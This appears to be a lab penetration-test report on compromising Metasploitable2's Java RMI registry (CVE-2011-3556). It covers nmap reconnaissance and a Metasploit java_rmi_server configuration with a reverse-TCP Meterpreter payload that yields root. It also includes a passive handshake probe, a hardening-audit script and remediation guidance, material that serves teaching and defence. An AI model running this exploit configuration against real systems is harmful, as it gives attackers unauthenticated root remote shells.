## https://sploitus.com/exploit?id=65908ED3-9DA0-5A00-8811-695FF78742C7
# Vulnerability Assessment: Java RMI Server Remote Code Execution (CVE-2011-3556)




## Executive Summary
This repository documents the exploitation of the **Java Remote Method Invocation (RMI)** registry service on **Metasploitable2**. The weakness is an insecure default: the registry honours the codebase annotation carried by serialized objects it receives, so it will fetch and load classes from any URL a client names. By sending a serialized object whose annotation points at an attacker-hosted class, an unauthenticated attacker achieves **Remote Code Execution (RCE)**.
In this assessment the RMI service was running as **root**, so a single class load gave a complete system compromise with no prior authentication or user interaction.
---
## Engagement Overview
| Component | Details |
| :--- | :--- |
| **Attacker Machine** | Kali Linux (192.168.56.1) |
| **Target Machine** | Metasploitable2 (192.168.56.102) |
| **Vulnerability** | CVE-2011-3556 (Java RMI Insecure Default) |
| **Exploit Tool** | Metasploit Framework (MSF) |
| **Payload** | `java/meterpreter/reverse_tcp` |
| **Access Level** | **Root (UID 0)** |
---
## Vulnerability Analysis
### CVE-2011-3556
Java RMI can annotate serialized objects with a codebase URL so the receiving JVM can download classes it does not have locally. In affected releases, before `java.rmi.server.useCodebaseOnly` defaulted to `true`, an RMI registry whose Security Manager policy permits network class loading will fetch and instantiate classes from whatever URL the client supplies. (The `java.rmi.server.codebase` property is how a server advertises its own classes; the exploit abuses the client-supplied annotation the registry accepts on incoming calls.) CVE-2011-3556 is the Oracle JRE identifier referenced by the Metasploit module; the Metasploitable2 target actually runs GNU Classpath's `grmiregistry`, which the exploitation below showed accepts the same remote codebase.
> **Impact:** An attacker can point the RMI registry at a malicious codebase containing a reverse shell or other arbitrary code. Because the service on Metasploitable2 runs as `root`, the attacker gains full administrative control of the target.
---
## Attack Lifecycle
### 1. Reconnaissance & Enumeration
The target was identified using `netdiscover`, followed by an `nmap` version scan to pinpoint the RMI registry.
```bash
# Nmap scan identifying the Java RMI registry
nmap -sV -p 1099 192.168.56.102
```
*Findings: Port 1099/TCP was open and fingerprinted as `java-rmi` (GNU Classpath grmiregistry). The version banner alone does not prove exploitability; that was confirmed in the next step.*
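The version scan above fingerprints port 1099 by completing the JRMI transport handshake. The following probe, added here as an example and not part of the original report, does the same thing by hand and stops before any `Call` message, so it confirms a live RMI endpoint without exercising the class-loading path at all. `FakeRegistry` is a constructed stand-in that speaks only the handshake, so the block runs offline; point `probe_rmi` at the real target address for a live check.

```python
"""Passive Java RMI transport-handshake probe (added example, not from the report).

Wire format (RMI transport protocol): client sends magic "JRMI", a 2-byte
version (2) and a 1-byte protocol selector; the server answers ProtocolAck
(0x4e) followed by an EndpointIdentifier (UTF host, int port) describing the
client as it sees it, or ProtocolNotSupported (0x4f).
"""
import socket
import struct
import threading

JRMI_MAGIC = b"JRMI"            # 0x4a 0x52 0x4d 0x49
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B          # 'K': StreamProtocol
PROTOCOL_ACK = 0x4E             # 'N'
PROTOCOL_NOT_SUPPORTED = 0x4F   # 'O'


def build_handshake() -> bytes:
    """Client header: 4-byte magic, 2-byte version, 1-byte protocol selector."""
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL)


def _read_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf


def _read_utf(sock: socket.socket) -> str:
    """DataInput.readUTF wire form: 2-byte big-endian length, then the bytes."""
    (length,) = struct.unpack(">H", _read_exact(sock, 2))
    return _read_exact(sock, length).decode("utf-8", errors="replace")


def probe_rmi(host: str, port: int, timeout: float = 3.0) -> dict:
    """Send the header, parse the reply, and close without issuing any Call.

    The echoed endpoint is returned so the caller can spot NAT or a proxy
    sitting between the scanner and the registry.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_handshake())
        status = _read_exact(sock, 1)[0]
        if status != PROTOCOL_ACK:
            return {"ack": False, "status": status}
        seen_host = _read_utf(sock)
        (seen_port,) = struct.unpack(">i", _read_exact(sock, 4))
        return {"ack": True, "seen_host": seen_host, "seen_port": seen_port}


class FakeRegistry(threading.Thread):
    """Constructed stand-in that speaks only the handshake, for offline runs."""

    def __init__(self) -> None:
        super().__init__(daemon=True)
        self.server = socket.socket()
        self.server.bind(("127.0.0.1", 0))
        self.server.listen(1)
        self.port = self.server.getsockname()[1]

    def run(self) -> None:
        conn, (client_host, client_port) = self.server.accept()
        with conn, self.server:
            header = _read_exact(conn, 7)
            if header[:4] != JRMI_MAGIC or header[6] != STREAM_PROTOCOL:
                conn.sendall(bytes([PROTOCOL_NOT_SUPPORTED]))
                return
            host = client_host.encode()
            conn.sendall(bytes([PROTOCOL_ACK])
                         + struct.pack(">H", len(host)) + host
                         + struct.pack(">i", client_port))


def demo() -> dict:
    """Run the probe against the local stand-in and return its result."""
    reg = FakeRegistry()
    reg.start()
    return probe_rmi("127.0.0.1", reg.port)


if __name__ == "__main__":
    print(demo())   # e.g. {'ack': True, 'seen_host': '127.0.0.1', 'seen_port': 5xxxx}
```

A `ProtocolAck` only proves that something speaking the RMI transport is listening; whether it will load a client-supplied codebase is a separate question that this probe deliberately does not ask.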
### 2. Exploitation
The Metasploit module `exploit/multi/misc/java_rmi_server` was used to exploit the insecure class-loading mechanism.
**Configuration:**
- **Module:** `exploit/multi/misc/java_rmi_server`
- **RHOSTS:** `192.168.56.102`
- **LHOST:** `192.168.56.1`
- **Payload:** `java/meterpreter/reverse_tcp`
### 3. Post-Exploitation
The exploit successfully triggered the remote class load, establishing a **Meterpreter** session. A shell was then spawned and upgraded to a TTY.
```bash
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
```
*Result: Immediate root access confirmed.*
---
## Remediation & Recommendations
| Strategy | Action Item |
| :--- | :--- |
| **Patching** | Upgrade to a JDK/JRE in which `java.rmi.server.useCodebaseOnly` defaults to `true` (Oracle 7u21 / 6u45 and later, and every JDK 8+ release), so client-supplied codebase annotations are ignored; on older runtimes that cannot be upgraded, set `-Djava.rmi.server.useCodebaseOnly=true` explicitly. |
| **Hardening** | Run the registry under a restrictive Java Security Manager policy that denies class downloads from network codebases, and run it as an unprivileged service account rather than `root`, so a future class-loading flaw does not yield UID 0. |
| **Network** | Block 1099/TCP (and the anonymous high ports that exported RMI objects listen on) at the network perimeter and with host-based firewalls. |
| **Decommission** | Disable or remove the Java RMI service if it is not required for business operations. |
| **Segmentation** | Isolate RMI services within dedicated management VLANs with strict access controls. |
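Checking whether the patching and hardening rows above are actually in force on a fleet comes down to the runtime version and the `-D` flag on each JVM. The audit script below is added here as an example and is not part of the original report. It assumes `ps -eo args`-style command lines paired with each runtime's `java -version` string (both constructed inline), and takes 6u45 and 7u21 as the first Oracle updates that default `java.rmi.server.useCodebaseOnly` to `true`, with every JDK 8+ release defaulting to `true`.

```python
"""Audit JVM command lines for RMI remote-class-loading hardening.

Added example, not from the original report. An explicit
-Djava.rmi.server.useCodebaseOnly flag wins; otherwise the verdict comes
from the runtime's default for that version.
"""
import re

FLAG_RE = re.compile(r"-Djava\.rmi\.server\.useCodebaseOnly=(true|false)\b")
# First update of each legacy family whose default is already safe (assumed:
# Oracle 6u45 and 7u21 release notes); families 8+ are safe by default.
SAFE_DEFAULT_SINCE = {6: 45, 7: 21}


def parse_java_version(version: str) -> tuple:
    """Return (family, update) for "1.7.0_21"-style and "11.0.2"-style strings."""
    m = re.fullmatch(r"1\.(\d+)\.\d+(?:_(\d+))?", version)
    if m:                                   # legacy 1.x.0_u form
        return int(m.group(1)), int(m.group(2) or 0)
    m = re.fullmatch(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if m:                                   # 9+ form: major.minor.security
        return int(m.group(1)), int(m.group(3) or 0)
    raise ValueError(f"unrecognised Java version string: {version!r}")


def default_is_safe(version: str) -> bool:
    """True when this runtime ignores client codebase annotations by default."""
    family, update = parse_java_version(version)
    if family >= 8:
        return True
    since = SAFE_DEFAULT_SINCE.get(family)
    return since is not None and update >= since


def assess(cmdline: str, version: str) -> dict:
    """Combine the explicit flag (if any) with the runtime default."""
    m = FLAG_RE.search(cmdline)
    if m:
        effective, source = (m.group(1) == "true"), "explicit flag"
    else:
        effective, source = default_is_safe(version), f"default for {version}"
    fix = None if effective else "set -Djava.rmi.server.useCodebaseOnly=true or upgrade"
    return {"cmd": cmdline.split()[0], "use_codebase_only": effective,
            "source": source, "fix": fix}


# Constructed sample inventory: (java -version string, process command line).
SAMPLE = [
    ("1.6.0_20", "rmiregistry 1099"),
    ("1.6.0_20", "java -Djava.rmi.server.useCodebaseOnly=true -jar app.jar"),
    ("1.8.0_292", "java -Djava.rmi.server.useCodebaseOnly=false -jar legacy.jar"),
    ("11.0.2", "java -jar app.jar"),
]


def audit(inventory=SAMPLE) -> list:
    """Return only the processes that still accept client-supplied codebases."""
    results = [assess(cmd, ver) for ver, cmd in inventory]
    return [r for r in results if not r["use_codebase_only"]]


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

Two caveats for real use: properties set through `JAVA_TOOL_OPTIONS` or `System.setProperty` at startup do not appear in the process arguments, so the command line can under-report; and the script reasons only about Oracle/OpenJDK runtimes. For the GNU Classpath `grmiregistry` found on Metasploitable2 the applicable rows are decommissioning and network control, not this flag.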
---
## MITRE ATT&CK® Mapping
| Tactic | Technique | ID |
| :--- | :--- | :--- |
| **Discovery** | Network Service Discovery | [T1046](https://attack.mitre.org/techniques/T1046/) |
| **Initial Access** | Exploit Public-Facing Application | [T1190](https://attack.mitre.org/techniques/T1190/) |
| **Execution** | Command and Scripting Interpreter: Unix Shell | [T1059.004](https://attack.mitre.org/techniques/T1059/004/) |
| **Command & Control** | Non-Standard Port | [T1571](https://attack.mitre.org/techniques/T1571/) |
---
## References
- [NVD - CVE-2011-3556](https://nvd.nist.gov/vuln/detail/CVE-2011-3556)
- [Rapid7 Exploit Database: Java RMI Server](https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/)
- [Oracle Java RMI Security Guidelines](https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/)
---
*Disclaimer: This report is for educational and authorized penetration testing purposes only. Unauthorized access to computer systems is illegal.*